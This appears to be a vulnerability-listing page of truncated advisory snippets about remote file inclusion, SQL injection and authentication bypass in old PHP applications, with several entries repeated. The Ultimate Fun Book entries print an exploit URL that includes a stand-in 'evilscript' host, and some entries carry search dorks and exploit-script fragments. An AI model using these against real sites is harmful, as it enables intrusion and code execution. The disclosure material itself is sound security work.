Gizzar <= (basePath) Remote File Include Vulnerability

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= Gizzar = basePath Remote File Include Vulnerability Download: http://mesh.dl.sourceforge.net/sourceforge/gizzar/gizzar-03162002.tar.gz Discover: BorN To K!LL =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= Bug in: index.php code:...

gizzar-rfi.txt

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= Gizzar = basePath Remote File Include Vulnerability Download: http://mesh.dl.sourceforge.net/sourceforge/gizzar/gizzar-03162002.tar.gz Discover: BorN To K!LL =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= Bug in: index.php code:...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in PHPEcho CMS 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the 1 pluginfile parameter to smarty/internals/core.loadpulgins.php or the 2 rootpath parameter to index.php. NOTE: CVE disputes 1 because the inclusion occurs...

phpMyNewsletter 0.8 (beta5) - Multiple Vulnerabilities

phpMyNewsletter 0.8 beta5 - Multiple Vulnerabilities !/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc Delete Config Value Rude Attack - can't do anything after 2 - Send an Email to all of the subscribers Do not alter anything Related: 1 - None...

Code injection

Direct static code injection vulnerability in admin/configuration.php in Guestbara 1.2 and earlier allows remote authenticated users to inject arbitrary PHP code into config.php via the 1 adminmail, 2 emotpatch, 3 login, 4 pass, and unspecified other parameters. NOTE: the provenance of this...

CVE-2006-7132

Directory traversal vulnerability in pmd-config.php in PHPMyDesk 1.0beta allows remote attackers to include arbitrary local files via the pmdlang parameter to viewticket.php...

CVE-2006-7091

PHP remote file inclusion vulnerability in config.php in phpht Topsites FREE 1.022b allows remote attackers to execute arbitrary PHP code via a URL in the fullpath parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information...

CVE-2006-7091

CVE-2006-7091 affects phpht Topsites FREE 1.022b. A PHP remote file inclusion vulnerability exists in config.php that lets a remote attacker supply a URL in the fullpath parameter to execute arbitrary PHP code. The vulnerability’s provenance is uncertain, with details derived from third‑party inf...

CVE-2006-7091

PHP remote file inclusion vulnerability in config.php in phpht Topsites FREE 1.022b allows remote attackers to execute arbitrary PHP code via a URL in the fullpath parameter. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information...

CVE-2006-7025

SQL injection vulnerability in admin/config.php in Bookmark4U 2.0 and 2.1 allows remote attackers to inject arbitrary SQL command via the sqlcmd parameter...

CVE-2006-7025

CVE-2006-7025 describes an SQL injection in the Bookmark4U app, affecting versions 2.0 and 2.1. The vulnerability is triggered in admin/config.php via the sqlcmd parameter, allowing remote attackers to inject arbitrary SQL. CVSS v2 base score 7.5 (HIGH) indicates potential impact on confidentiali...

Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability:

Ultimate Fun Book 1.02 found by:kezzap66345 contant= : download script=http://www.ultimate-fun-board.de dork:Ultimate-Fun-Book 1.02 file: function.php code: ?php require$gbpfad."/config.php"; exploit: http://target/path/function.php?gbpfad=http://evilscript thanx= x0r0n,str0ke,shakia milw0rm.com...

CVE-2007-1043

Ezboo webstats, possibly 3.0.3, allows remote attackers to bypass authentication and gain access via a direct request to 1 update.php and 2 config.php...

CVE-2007-1043

CVE-2007-1043 concerns Ezboo Webstats (possibly v3.0.3), where an authentication bypass enables remote access via direct requests to 1) update.php and 2) config.php. Multiple sources corroborate a remote, unauthenticated bypass affecting the product, with a CVSS v2 base score of 7.5 (HIGH) and ne...

EUVD-2007-1040

Ezboo webstats, possibly 3.0.3, allows remote attackers to bypass authentication and gain access via a direct request to 1 update.php and 2 config.php...

Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ======================================================================= Ultimate Fun Book 1.02 function.php Remote File Include Vulnerability ======================================================================= Ultimate Fun Book 1.02...

Ultimate Fun Book 1.02 - 'function.php' Remote File Inclusion

Ultimate Fun Book 1.02 found by:kezzap66345 contant= : download script=http://www.ultimate-fun-board.de dork:Ultimate-Fun-Book 1.02 file: function.php code: ?php require$gbpfad."/config.php"; exploit: http://target/path/function.php?gbpfad=http://evilscript thanx= x0r0n,str0ke,shakia milw0rm.com...

ezConvert: phpBB ezBoard converter v0.2 (ezconvert_dir) Remote File Include Exploit

No description provided by source. C xoron Name: ezConvert: phpBB ezBoard converter v0.2 ezconvertdir Remote File Include Exploit Author: xoron Exploit coded by xoron Download: http://sourceforge.net/project/showfiles.php?groupid=114129 xoron.biz - xoron.info www.xoron.info/bugs/ezconvert.txt...

CVE-2007-0863

PHP remote file inclusion vulnerability in Trevorchan 0.7 and earlier allows remote attackers to execute arbitrary code via the tcconfigrootdir parameter to 1 upgrade.php, 2 paintsave.php, 3 menu.php, 4 manage.php, and 5 banned.php. NOTE: his issue has been disputed by reliable third parties, who...

Remote file inclusion

PHP remote file inclusion vulnerability in config.php in phpBB ezBoard converter ezconvert 0.2 allows remote attackers to execute arbitrary PHP code via a URL in the ezconvertdir parameter...